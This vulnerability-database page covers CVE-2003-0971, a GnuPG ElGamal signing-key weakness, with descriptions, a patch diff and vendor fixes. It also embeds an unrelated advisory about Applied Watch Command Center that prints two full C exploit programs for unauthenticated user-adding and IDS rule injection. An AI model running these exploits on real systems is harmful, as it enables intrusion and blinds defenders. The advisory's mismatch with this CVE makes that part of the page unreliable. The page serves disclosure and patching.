CVE-2003-0971
CVSS5.0
发布时间 :2003-12-15 00:00:00
修订时间 :2016-10-17 22:38:37
NMCOPS    

[原文]GnuPG (GPG) 1.0.2, and other versions up to 1.2.3, creates ElGamal type 20 (sign+encrypt) keys using the same key component for encryption as for signing, which allows attackers to determine the private key from a signature.


[CNNVD]GnuPG ElGamal签名密钥私钥信息泄露漏洞(CNNVD-200312-024)

        
        GNU Privacy Guard (GnuPG)是一款开放源代码的加密程序。
        GnuPG在处理ElGamal签名密钥实现时存在漏洞,远程攻击者可以利用这个问题获得目标用户私钥信息。
        GnuPG允许建立ELGamal密钥用于加密和签名。2000年1月的1.0.2版本,GnuPG对建立ELGamal密钥进行的有效修改,可以更高效的进行加密(选择小的X密码指数(secret exponent)和使用小的K用于加密),不过对这个更改导致签名密钥时产生问题:用于加密的小的K也用于签名,如果攻击者获取一个用此密钥生成的签名,就可以利用这种密码攻击方法来得出这个私钥。由于由这个密钥建立的签名用于绑定用户ID和其他重要密钥,因此此类签名一般都用于primary ElGamal密钥,即使这个密钥从来没有对文档进行签字也可能遭到此漏洞破坏。
        这个漏洞针对普通的(type 16)加密ELGamal密钥不受影响,因此GnuPG不允许使用这类型的密钥进行签名。只有ELGamal签名+加密密钥(type 20)存在此漏洞。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:gnu:privacy_guard:1.0.7GNU GNU Privacy Guard 1.0.7
cpe:/a:gnu:privacy_guard:1.2GNU GNU Privacy Guard 1.2
cpe:/a:gnu:privacy_guard:1.0.6GNU GNU Privacy Guard 1.0.6
cpe:/a:gnu:privacy_guard:1.0.5GNU GNU Privacy Guard 1.0.5
cpe:/a:gnu:privacy_guard:1.2.3GNU GNU Privacy Guard 1.2.3
cpe:/a:gnu:privacy_guard:1.0.4GNU GNU Privacy Guard 1.0.4
cpe:/a:gnu:privacy_guard:1.2.2GNU GNU Privacy Guard 1.2.2
cpe:/a:gnu:privacy_guard:1.0.3GNU GNU Privacy Guard 1.0.3
cpe:/a:gnu:privacy_guard:1.2.1GNU GNU Privacy Guard 1.2.1
cpe:/a:gnu:privacy_guard:1.0.2GNU GNU Privacy Guard 1.0.2
cpe:/a:gnu:privacy_guard:1.0.3b
cpe:/a:gnu:privacy_guard:1.2.2:rc1

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:10982GnuPG (GPG) 1.0.2, and other versions up to 1.2.3, creates ElGamal type 20 (sign+encrypt) keys using the same key component for encryption a...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0971
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0971
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-024
(官方数据源) CNNVD

- 其它链接及资源

ftp://patches.sgi.com/support/free/security/advisories/20040202-01-U.asc
(UNKNOWN)  SGI  20040202-01-U
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000798
(UNKNOWN)  CONECTIVA  CLA-2003:798
http://lists.gnupg.org/pipermail/gnupg-announce/2003q4/000276.html
(VENDOR_ADVISORY)  CONFIRM  http://lists.gnupg.org/pipermail/gnupg-announce/2003q4/000276.html
http://lists.gnupg.org/pipermail/gnupg-announce/2003q4/000277.html
(PATCH)  CONFIRM  http://lists.gnupg.org/pipermail/gnupg-announce/2003q4/000277.html
http://marc.info/?l=bugtraq&m=106995769213221&w=2
(UNKNOWN)  BUGTRAQ  20031127 GnuPG's ElGamal signing keys compromised
http://www.debian.org/security/2004/dsa-429
(UNKNOWN)  DEBIAN  DSA-429
http://www.kb.cert.org/vuls/id/940388
(UNKNOWN)  CERT-VN  VU#940388
http://www.mandriva.com/security/advisories?name=MDKSA-2003:109
(UNKNOWN)  MANDRAKE  MDKSA-2003:109
http://www.novell.com/linux/security/advisories/2003_048_gpg.html
(UNKNOWN)  SUSE  SuSE-SA:2003:048
http://www.redhat.com/support/errata/RHSA-2003-390.html
(UNKNOWN)  REDHAT  RHSA-2003:390
http://www.redhat.com/support/errata/RHSA-2003-395.html
(UNKNOWN)  REDHAT  RHSA-2003:395
http://www.securityfocus.com/bid/9115
(VENDOR_ADVISORY)  BID  9115

- 漏洞信息

GnuPG ElGamal签名密钥私钥信息泄露漏洞
中危 设计错误
2003-12-15 00:00:00 2005-10-20 00:00:00
远程  
        
        GNU Privacy Guard (GnuPG)是一款开放源代码的加密程序。
        GnuPG在处理ElGamal签名密钥实现时存在漏洞,远程攻击者可以利用这个问题获得目标用户私钥信息。
        GnuPG允许建立ELGamal密钥用于加密和签名。2000年1月的1.0.2版本,GnuPG对建立ELGamal密钥进行的有效修改,可以更高效的进行加密(选择小的X密码指数(secret exponent)和使用小的K用于加密),不过对这个更改导致签名密钥时产生问题:用于加密的小的K也用于签名,如果攻击者获取一个用此密钥生成的签名,就可以利用这种密码攻击方法来得出这个私钥。由于由这个密钥建立的签名用于绑定用户ID和其他重要密钥,因此此类签名一般都用于primary ElGamal密钥,即使这个密钥从来没有对文档进行签字也可能遭到此漏洞破坏。
        这个漏洞针对普通的(type 16)加密ELGamal密钥不受影响,因此GnuPG不允许使用这类型的密钥进行签名。只有ELGamal签名+加密密钥(type 20)存在此漏洞。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 如下为针对GnuPG 1.2.3的补丁:
        Index: getkey.c
        ===================================================================
        RCS file: /cvs/gnupg/gnupg/g10/getkey.c,v
        retrieving revision 1.78.2.20
        diff -u -r1.78.2.20 getkey.c
        --- getkey.c 21 Jul 2003 14:55:00 -0000 1.78.2.20
        +++ getkey.c 27 Nov 2003 00:32:30 -0000
        @@ -1655,6 +1655,11 @@
        if ( x ) /* mask it down to the actual allowed usage */
        key_usage &= x;
        }
        +
        + /* Type 20 Elgamal keys are not usable. */
        + if(pk->pubkey_algo==PUBKEY_ALGO_ELGAMAL)
        + key_usage=0;
        +
        pk->pubkey_usage = key_usage;
        if ( !key_expire_seen ) {
        @@ -1869,6 +1874,13 @@
        if ( x ) /* mask it down to the actual allowed usage */
        key_usage &= x;
        }
        +
        + /* Type 20 Elgamal subkeys or any subkey on a type 20 primary are
        + not usable. */
        + if(mainpk->pubkey_algo==PUBKEY_ALGO_ELGAMAL
        + || subpk->pubkey_algo==PUBKEY_ALGO_ELGAMAL)
        + key_usage=0;
        +
        subpk->pubkey_usage = key_usage;
        p = parse_sig_subpkt (sig->hashed, SIGSUBPKT_KEY_EXPIRE, NULL);
        Index: keygen.c
        ===================================================================
        RCS file: /cvs/gnupg/gnupg/g10/keygen.c,v
        retrieving revision 1.90.2.11
        diff -u -r1.90.2.11 keygen.c
        --- keygen.c 16 Jul 2003 03:09:15 -0000 1.90.2.11
        +++ keygen.c 27 Nov 2003 00:32:31 -0000
        @@ -958,8 +958,6 @@
        tty_printf( _(" (%d) DSA (sign only)\n"), 2 );
        if( addmode )
        tty_printf( _(" (%d) ElGamal (encrypt only)\n"), 3 );
        - if (opt.expert)
        - tty_printf( _(" (%d) ElGamal (sign and encrypt)\n"), 4 );
        tty_printf( _(" (%d) RSA (sign only)\n"), 5 );
        if (addmode)
        tty_printf( _(" (%d) RSA (encrypt only)\n"), 6 );
        @@ -989,21 +987,6 @@
        algo = PUBKEY_ALGO_RSA;
        *r_usage = PUBKEY_USAGE_SIG;
        break;
        - }
        - else if( algo == 4 && opt.expert)
        - {
        - tty_printf(_(
        -"The use of this algorithm is only supported by GnuPG. You will not be\n"
        -"able to use this key to communicate with PGP users. This algorithm is also\n"
        -"very slow, and may not be as secure as the other choices.\n"));
        -
        - if( cpr_get_answer_is_yes("keygen.algo.elg_se",
        - _("Create anyway? ")))
        - {
        - algo = PUBKEY_ALGO_ELGAMAL;
        - *r_usage = PUBKEY_USAGE_ENC | PUBKEY_USAGE_SIG;
        - break;
        - }
        }
        else if( algo == 3 && addmode ) {
        algo = PUBKEY_ALGO_ELGAMAL_E;
        厂商补丁:
        MandrakeSoft
        ------------
        MandrakeSoft已经为此发布了一个安全公告(MDKSA-2003:109)以及相应补丁:
        MDKSA-2003:109:Updated gnupg packages fix vulnerability with ElGamal signing keys
        链接:
        http://www.linux-mandrake.com/en/security/2003/2003-109.php

        补丁下载:
        Updated Packages:
        Corporate Server 2.1:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/RPMS/gnupg-1.0.7-3.2.C21mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/SRPMS/gnupg-1.0.7-3.2.C21mdk.src.rpm
        Corporate Server 2.1/x86_64:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/x86_64/corporate/2.1/RPMS/gnupg-1.0.7-3.2.C21mdk.x86_64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/x86_64/corporate/2.1/SRPMS/gnupg-1.0.7-3.2.C21mdk.src.rpm
        Mandrake Linux 9.0:
        上述升级软件还可以在下列地址中的任意一个镜像ftp服务器上下载:
        
        http://www.mandrakesecure.net/en/ftp.php

- 漏洞信息 (F32282)

_BSSADV-0000.txt (PacketStormID:F32282)
2003-12-01 00:00:00
The Bugtraq Team  bugtraq.org
exploit,remote,vulnerability
CVE-2003-0970,CVE-2003-0971
[点击下载]

Bugtraq Security Systems Security Advisory - Multiple vulnerabilities have been discovered in the Applied Watch Command Center IDS. Two exploits have been released to demonstrate these flaws. The first, appliedsnatch.c, allows a remote attacker to add a user to the console without having to authenticate to the system. The second, addrule.c, allows a remote attacker to add custom IDS alerts to all sensor nodes in a network, enabling a human denial-of-service attack by making good packets look bad.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

	        Bugtraq Security Systems, Incorporated
 			    www.bugtraq.org

                           Security Advisory

Advisory Name: Multiple Issues in Applied Watch Command Center
 Release Date: 11/27/2003
  Application: Applied Watch
     Platform: Linux (IA32)
               Linux (sparc)
	       Linux (sparc64)
	       Linux (hppa)
	       Linux (ppc)
	       Linux (xbox)
	       Linux (IA64)
	       SUN Solaris (IA32)
	       SUN Solaris (sparc)
	       SUN Solaris (sparc64)
	       OpenBSD (386)
               HPUX (hppa)
	       HPUX (IA64)
               Compaq True64
	       Microsoft Windows NT (Alpha)
	       Microsoft Windows NT (IA32)
     Severity: Secure protocol implementation weaknesses, allows for
               authentication bypass and compromise of IDS nodes.
       Author: The Bugtraq Team, Collectively  [bugtraq@bugtraq.org]
Vendor Status: Patches pending.
CVE Candidate: CAN-2003-0970 - Authentication Bypass to Add IDS Rules
               CAN-2003-0971 - Authentication Bypass to Add Users
    Reference: www.bugtraq.org/advisories/_BSSADV-0000.txt 


Overview:
      The Applied Watch Command Center boasts the industry's first
truly OS-native platform for managing network threats in real-time.  It
frees users from the unreliable, more difficult, and less-secure 
Web-based monitoring enviornment of Snort IDS sensors.  From a central,
desktop console Supporting Mac, Linux, Unix, and Windows, thousands of 
IDS agents and the server can be monitored.  The Command Center gives 
you these benefits:

      1. Interprets alerts generated by third-party solutions, parsing
         the alerts into high, medium, and low priority;
      2. Allows you to identify false positives;
      3. Lets you store notes on events to prevent duplication of 
         effort, saving valuable man-hours;
      4. Provides greater security with an OS-native, desktop console;
      5. Lets you avoid the high cost of Security Information Management
         Systems (SIMs); and
      6. Reduces your IDS cost of ownership.

      It should also be noted that the lead developer of this system is
named Jason Ish, who is a member of the core OpenBSD development team
and is therefor a security expert.  He has a son named Theo, named after
the great pioneer of proactive security, Theo Deraadt.

      There exist a number of vulnerabilities in the various components
of the Applied Watch software suite; this advisory being the first of 
many to come regarding the various logic-related security vulnerabilities
in the software.  After all such problems are eliminated from the codebase,
we will begin releasing another set of advisories concerning multiple 
instances in the code that allow for the remote execution of arbitrary code
throughout the various components of this system.


Details:

[1] Adding a User

Using the attached program, appliedsnatch.c, a malicious individual on a
network protected by the Applied Watch Solution can add new users to a 
console, without having to authenticate to the system.

- --- begin appliedsnatch.c ---

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <openssl/ssl.h>

#define PUT_UINT32(i, val)\
	{\
	  buf[(i) ++] = ((val) >> 24) & 0xff;\
	  buf[(i) ++] = ((val) >> 16) & 0xff;\
	  buf[(i) ++] = ((val) >> 8) & 0xff;\
	  buf[(i) ++] = (val) & 0xff;\
	}

int main(int argc, char *argv[])
{
  unsigned char *buf;
  unsigned int idx, i;
  size_t userlen, passlen, buflen, lenidx;
  int sock;
  struct sockaddr_in sin;
  unsigned char respbuf[28];
  ssize_t n;
  SSL_CTX *sslctx;
  SSL *ssl;
  
  if (argc != 5) { fprintf(stderr, "usage: %s <host> <port> <user> <pass>\n", argv[0]); exit(1); }
  userlen = strlen(argv[3]);
  passlen = strlen(argv[4]);
  buf = malloc(buflen = 12 + 4 + userlen + 4 + 4 + passlen + 4 + 4 + 4);
  memset(buf, 0, buflen);
  idx = 0;
  PUT_UINT32(idx, 0xbabe0001); /* 0xbabe0002 for other protocol ver */
  PUT_UINT32(idx, 0x6a);
  lenidx = idx;
  PUT_UINT32(idx, 0xf00fc7c8);
  //PUT_UINT32(idx, 0); /* uncomment for other protocol ver */
  PUT_UINT32(idx, userlen);
  memcpy(&buf[idx], argv[3], userlen); idx += userlen;
  idx |= 3; idx ++;
  PUT_UINT32(idx, passlen);
  memcpy(&buf[idx], argv[4], passlen); idx += passlen;
  idx |= 3; idx ++;
  PUT_UINT32(idx, 0x1);
  PUT_UINT32(idx, 0x1);
  PUT_UINT32(lenidx, idx);
  printf("connecting\n");
  memset(&sin, 0, sizeof(sin));
  sin.sin_family = AF_INET;
  sin.sin_port = htons(atoi(argv[2]));
  if ((sin.sin_addr.s_addr = inet_addr(argv[1])) == -1)
  {
    struct hostent *he;
    
    if ((he = gethostbyname(argv[1])) == NULL) { perror("gethostbyname()"); exit(1); }
    memcpy(&sin.sin_addr, he->h_addr, 4);
  }
  sock = socket(AF_INET, SOCK_STREAM, 0);
  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) { perror("connect()"); exit(1); }
  printf("doing ssl handshake\n");
  SSL_load_error_strings();
  SSL_library_init();
  if ((sslctx = SSL_CTX_new(SSLv23_client_method())) == NULL) { fprintf(stderr, "SSL_CTX_new()\n"); exit(1); }
  if ((ssl = SSL_new(sslctx)) == NULL) { fprintf(stderr, "SSL_new()\n"); exit(1); }
  if (SSL_set_fd(ssl, sock) != 1) { fprintf(stderr, "SSL_set_fd()\n"); exit(1); }
  if (SSL_connect(ssl) != 1) { fprintf(stderr, "SSL_connect()\n"); exit(1); }
  printf("sending %u bytes:\n", idx);
  for (i = 0; i < idx; i ++) printf("%.2x ", buf[i]);
  if (SSL_write(ssl, buf, idx) != idx) { perror("write()"); exit(1); }
  printf("\nreading:\n");
  i = 0;
  while (i < sizeof(respbuf))
  {
    if ((n = SSL_read(ssl, &respbuf[i], sizeof(respbuf) - i)) < 0) { perror("read()"); exit(1); }
    i -= n;
  }
  for (i = 0; i < sizeof(respbuf); i ++) printf("%.2x ", respbuf[i]);
  printf("\n");
  printf("adding user \"%s\" with password \"%s\" %s\n", argv[3], argv[4], (memcmp(&respbuf[16], "\x00\x00\x00\x00", 4) == 0)? "succeeded" : "failed");
  SSL_shutdown(ssl);
  close(sock);
  return 0;
}

- --- end appliedsnatch.c ---


[2] Adding a Rule

Using the second attached program, addrule.c, a malicious individual can
introduce custom IDS alerts to all sensor nodes on a network, allowing a
human denial-of-service attack against the security experts monitoring the
console.  This is a valid technique for subverting intrusion detection 
systems.  This is also a demonstration of the "sometimes good packets look
like bad packets, while bad packets go unnoticed by the intrusion detection
system" concept.

- --- begin addrule.c ---

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <openssl/ssl.h>

#define PUT_UINT32(i, val)\
	{\
	  buf[(i) ++] = ((val) >> 24) & 0xff;\
	  buf[(i) ++] = ((val) >> 16) & 0xff;\
	  buf[(i) ++] = ((val) >> 8) & 0xff;\
	  buf[(i) ++] = (val) & 0xff;\
	}

int main(int argc, char *argv[])
{
  unsigned char *buf;
  unsigned int idx, i;
  size_t rulelen, buflen, lenidx;
  int sock;
  struct sockaddr_in sin;
  unsigned char respbuf[28];
  ssize_t n;
  SSL_CTX *sslctx;
  SSL *ssl;
  unsigned char *ruleset = "alert tcp any any -> any any (msg: \"*GOBBLE* *GOBBLE* *GOBBLE* *GOBBLE* \\:PpppppPPppppppPPPPPPpppp\";)";
  
  if (argc != 3) { fprintf(stderr, "usage: %s <host> <port>\n", argv[0]); exit(1); }
  rulelen = strlen(ruleset);
  buf = malloc(buflen = 12 + 4 + 4 + 4 + rulelen + 4);
  memset(buf, 0, buflen);
  idx = 0;
  PUT_UINT32(idx, 0xbabe0001); /* 0xbabe0002 for other protocol ver */
  PUT_UINT32(idx, 0x6f);
  lenidx = idx;
  PUT_UINT32(idx, 0xf00fc7c8);
  //PUT_UINT32(idx, 0); /* uncomment for other protocol ver */
  PUT_UINT32(idx, 0);
  PUT_UINT32(idx, 1);
  PUT_UINT32(idx, rulelen);
  memcpy(&buf[idx], ruleset, rulelen); idx += rulelen;
  idx |= 3; idx ++;
  PUT_UINT32(lenidx, idx);
  printf("connecting\n");
  memset(&sin, 0, sizeof(sin));
  sin.sin_family = AF_INET;
  sin.sin_port = htons(atoi(argv[2]));
  if ((sin.sin_addr.s_addr = inet_addr(argv[1])) == -1)
  {
    struct hostent *he;
    
    if ((he = gethostbyname(argv[1])) == NULL) { perror("gethostbyname()"); exit(1); }
    memcpy(&sin.sin_addr, he->h_addr, 4);
  }
  sock = socket(AF_INET, SOCK_STREAM, 0);
  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) { perror("connect()"); exit(1); }
  printf("doing ssl handshake\n");
  SSL_load_error_strings();
  SSL_library_init();
  if ((sslctx = SSL_CTX_new(SSLv23_client_method())) == NULL) { fprintf(stderr, "SSL_CTX_new()\n"); exit(1); }
  if ((ssl = SSL_new(sslctx)) == NULL) { fprintf(stderr, "SSL_new()\n"); exit(1); }
  if (SSL_set_fd(ssl, sock) != 1) { fprintf(stderr, "SSL_set_fd()\n"); exit(1); }
  if (SSL_connect(ssl) != 1) { fprintf(stderr, "SSL_connect()\n"); exit(1); }
  printf("sending %u bytes:\n", idx);
  for (i = 0; i < idx; i ++) printf("%.2x ", buf[i]);
  if (SSL_write(ssl, buf, idx) != idx) { perror("write()"); exit(1); }
  printf("\nreading:\n");
  i = 0;
  while (i < sizeof(respbuf))
  {
    if ((n = SSL_read(ssl, &respbuf[i], sizeof(respbuf) - i)) < 0) { perror("read()"); exit(1); }
    i -= n;
  }
  for (i = 0; i < sizeof(respbuf); i ++) printf("%.2x ", respbuf[i]);
  printf("\n");
  printf("adding nasty ruleset %s\n", (memcmp(&respbuf[16], "\x00\x00\x00\x00", 4) == 0)? "succeeded" : "failed");
  SSL_shutdown(ssl);
  close(sock);
  return 0;
}

- --- end addrule.c ---


Vendor Response:
     Bugtraq Security have attempted to contact the vendor multiple
times since the discovery of these vulnerabilities without success.  A
public statement issued by the founder of the company, Eric Hines, helps
us understand why the company was unavailable for comment at the time:

     "You've got to realize that these people are walking around with
exploits that vendors haven't even heard of yet.  They're pissed and 
they've got this almost God-like power that enables them to break into
any network that they want," Hines said.  He reported that FateLabs.com
was knocked offline last week by a denial-of-service attack immediately
after the security firm published an advisory about a security bug.

     We expect that once their network recovers from said incident, that
they will issue binary patches to both their clients and help reduce the
threat of compromise against those networks. Undoubtably they are aware
of these vulnerabilities already, and were hoping they would be brought
to public attention as, according to their website, they are "soldiers
for full disclosure".

ThreatCon:
      The release of this information and exploits increases the Global
ThreatCon Level to a record-breaking index of 9/13 (more dangerous than
normal) level.  We hope that Applied Watch will release their patches 
soon so that the ThreatCon can be lowered to a more reasonable level.  If
you have any questions regarding the Global ThreatCon, please visit
	http://www.bugtraq.org/threatcon.html


Recommendation:
      If the security of your network is required, then Fatelabs /
AppliedWatch products should be removed or disabled on the host in
question.  If it is not required, enterprises should deploy vendor patches
for the above vulnerabilities when they become available.  In addition,
enterprises should look to remove all default services if not required in
production systems or adequately protect those that are required and 
undertake other obvious security measures.

Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned 
the following names to these issues.  These are candidates for 
inclusion in the CVE list (http://cve.mitre.org), which standardizes 
names for security problems.

  CAN-2003-0960 - Logical error in Applied Watch Console allowing user-adds
  CAN-2003-0961 - Logical error in Applied Watch Nodes allowing rule-adds

Bugtraq Security Systems Vulnerability Reporting Policy: 
      http://www.bugtraq.org/research/policy/

Bugtraq Security Systems Advisory Archive:
      http://www.bugtraq.org/advisories.html

Bugtraq Security Systems PGP Key:
      http://www.bugtraq.org/pgp_key.asc

Bugtraq Security Systems is currently seeking application security experts 
to fill several consulting positions.  Applicants should have strong 
application development skills and be able to perform application security
design reviews, code reviews, and application penetration testing.  Please
send resumes to jobs@bugtraq.org

Copyright 2003 Bugtraq Security Systems. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE/xqQad3IqHnpF3voRAk2vAJ9a7JgZ8p/FRCdgN/qjqYMEyYnj+QCgkGor
vYwTicr3iCtfdrbxc0eeocY=
=GAEl
-----END PGP SIGNATURE-----
    

- 漏洞信息

2869
GnuPG ElGamal Encrypt+Sign Private Key Disclosure
Local Access Required, Remote / Network Access Cryptographic
Loss of Confidentiality, Loss of Integrity

- 漏洞描述

GnuPG has a serious flaw that compromises any ElGamal key used for signing or encrypting material. When GnuPG creates ElGamal sign+encrypt keys (type 20), it does so in a cryptographically weak way. This can be exploited to compromise the private key.

- 时间线

2003-11-27 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 1.2.3 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the patch provided by the vendor, which is applied to vulnerable 1.2.3 distributions.

- 相关参考

- 漏洞作者

- 漏洞信息

GnuPG ElGamal Signing Key Private Key Compromise Vulnerability
Design Error 9115
Yes No
2003-11-27 12:00:00 2009-07-12 12:56:00
Discovery of this issue is credited to Phong Q. Nguyen.

- 受影响的程序版本

SGI ProPack 2.4
SGI ProPack 2.3
RedHat gnupg-1.2.1-3.i386.rpm
+ RedHat Linux 9.0 i386
RedHat gnupg-1.0.7-6.i386.rpm
+ RedHat Linux 8.0 i386
RedHat gnupg-1.0.6-5.i386.rpm
+ RedHat Linux 7.3 i386
RedHat gnupg-1.0.6-3.ia64.rpm
+ RedHat Linux 7.2 ia64
RedHat gnupg-1.0.6-3.i386.rpm
+ RedHat Linux 7.2 i386
RedHat gnupg-1.0.4-11.i386.rpm
+ RedHat Linux 7.1 i386
GNU GNU Privacy Guard 1.2.3
+ Conectiva Linux 9.0
+ Mandriva Linux Mandrake 9.2
+ Turbolinux Turbolinux Desktop 10.0
GNU GNU Privacy Guard 1.2.2 -rc1
+ S.u.S.E. Linux Personal 8.2
GNU GNU Privacy Guard 1.2.2 -r1
+ Gentoo Linux 1.4 _rc3
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
GNU GNU Privacy Guard 1.2.2
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Workstation 3.1.1
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
GNU GNU Privacy Guard 1.2.1
+ Conectiva Linux 9.0
+ OpenPKG OpenPKG 1.2
+ RedHat Linux 9.0 i386
+ Terra Soft Solutions Yellow Dog Linux 3.0
GNU GNU Privacy Guard 1.2
GNU GNU Privacy Guard 1.0.7
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ MandrakeSoft apcupsd 2006.0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ OpenPKG OpenPKG 1.1
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 8.0 i386
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 i386
+ RedHat Linux Advanced Work Station 2.1
+ Sun Linux 5.0.5
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 6.5
+ Turbolinux Turbolinux Server 6.1
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Turbolinux Turbolinux Workstation 6.0
GNU GNU Privacy Guard 1.0.6
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
GNU GNU Privacy Guard 1.0.5
- Caldera OpenLinux 2.4
- Caldera OpenLinux 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.0 es
- Conectiva Linux 4.0
- Conectiva Linux graficas
- Conectiva Linux ecommerce
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- Debian Linux 2.2
- Immunix Immunix OS 7.0 beta
- Immunix Immunix OS 7.0
- Immunix Immunix OS 6.2
- MandrakeSoft Corporate Server 1.0.1
- Mandriva Linux Mandrake 8.1
- Mandriva Linux Mandrake 8.0 ppc
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- Mandriva Linux Mandrake 7.1
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Red Hat Linux 6.2
- RedHat Linux 7.1 i386
- RedHat Linux 7.1
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- Trustix Secure Linux 1.2
- Trustix Secure Linux 1.1
GNU GNU Privacy Guard 1.0.4
- Turbolinux Turbolinux 6.0.5
- Turbolinux Turbolinux Server 6.5
- Turbolinux Turbolinux Workstation 6.1
GNU GNU Privacy Guard 1.0.3 b
GNU GNU Privacy Guard 1.0.3
GNU GNU Privacy Guard 1.0.2

- 漏洞讨论

GnuPG is prone to a vulnerability in the implementation of ElGamal signing keys that could compromise private keys. The vendor has stated that this vulnerability could be practically exploited to compromise private keys in seconds. This vulnerability was introduced as of version 1.0.2 of GnuPG.

- 漏洞利用

The vendor has reported that there is a practical attack which will compromise private keys and all ElGamal signing keys that have been generated with vulnerable versions of the software should be considered compromised.

- 解决方案

Debian has released an updated advisory (DSA 429-2) and fixes to address this issue. Please see the referenced advisory for links to fixed packages.

Red Hat has released an advisory (RHSA-2003:390-01) that includes fixes for this issue. Please see the attached advisory for details on obtaining and applying fixes.

Conectiva has released an advisory that includes fixes for this issue.

Mandrake has released an advisory and fixes for this issue.

SuSE has released an advisory (SuSE-SA:2003:048) that includes fixes for this issue. Please see the attached advisory for details on obtaining and applying fixes.

The vendor has released a patch for this issue that can be applied to version 1.2.3. This fix will also be included in the next version.

Gentoo has released an advisory (200312-05) to address this issue. All Gentoo Linux systems should be updated to use gnupg-1.2.3-r5 or higher as follows:

emerge sync
emerge -pv '>=app-crypt/gnupg-1.2.3-r5'
emerge '>=app-crypt/gnupg-1.2.3-r5'
emerge clean

TurboLinux has released advisory TLSA-2003-68 and fixes to address this issue.

SGI advisory 20031203-01-U has been released to address this issue.

Debian has released an advisory (DSA 429-1) and fixes to address this issue. Please see the referenced advisory for links to fixed packages.

SGI has released an advisory 20040202-01-U to address this and other issues in SGI ProPack 2.4. Please see the referenced advisory for more information.

SCO has released advisory CSSA-2004-009.0 to address this issue.

Fixes are available below:


RedHat gnupg-1.0.7-6.i386.rpm

RedHat gnupg-1.2.1-3.i386.rpm

RedHat gnupg-1.0.6-3.ia64.rpm

RedHat gnupg-1.0.6-3.i386.rpm

RedHat gnupg-1.0.4-11.i386.rpm

RedHat gnupg-1.0.6-5.i386.rpm

GNU GNU Privacy Guard 1.0.7

GNU GNU Privacy Guard 1.2.2

GNU GNU Privacy Guard 1.2.2 -rc1

GNU GNU Privacy Guard 1.2.3

SGI ProPack 2.4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站